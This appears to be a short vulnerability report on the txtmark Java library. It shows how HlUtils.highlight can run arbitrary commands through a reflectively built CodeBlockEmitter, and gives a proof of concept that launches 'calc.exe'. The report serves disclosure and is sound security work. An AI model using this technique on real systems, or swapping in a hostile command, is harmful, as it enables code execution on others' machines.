There's a code injection vulnerability of com.github.rjeschke.txtmark.cmd.HlUtils.highlight

[LetianYuan]

com.github.rjeschke.txtmark.cmd.HlUtils.highlight is designed to highlight code blocks. However, passing an unchecked argument to this API can lead to the execution of arbitrary commands. For instance, first, we create an instance of CodeBlockEmitter and specify the parameter program of CodeBlockEmitter to ”calc.exe”:

Configuration.Builder builder = Configuration.builder();
Class clazz = Class.forName("com.github.rjeschke.txtmark.cmd.CodeBlockEmitter");
Constructor constructor = clazz.getDeclaredConstructors()[0];
constructor.setAccessible(true);
Object cb = constructor.newInstance("UTF-8", "calc.exe");

Second, we set CodeBlockEmitter to the instance that we just created.

builder.setCodeBlockEmitter((BlockEmitter) cb);
builder.forceExtentedProfile();
Configuration config = builder.build();
System.out.println(Processor.process("```java\n123\n```\n", config));

Finally, malicious programs “calc.exe” would be executed.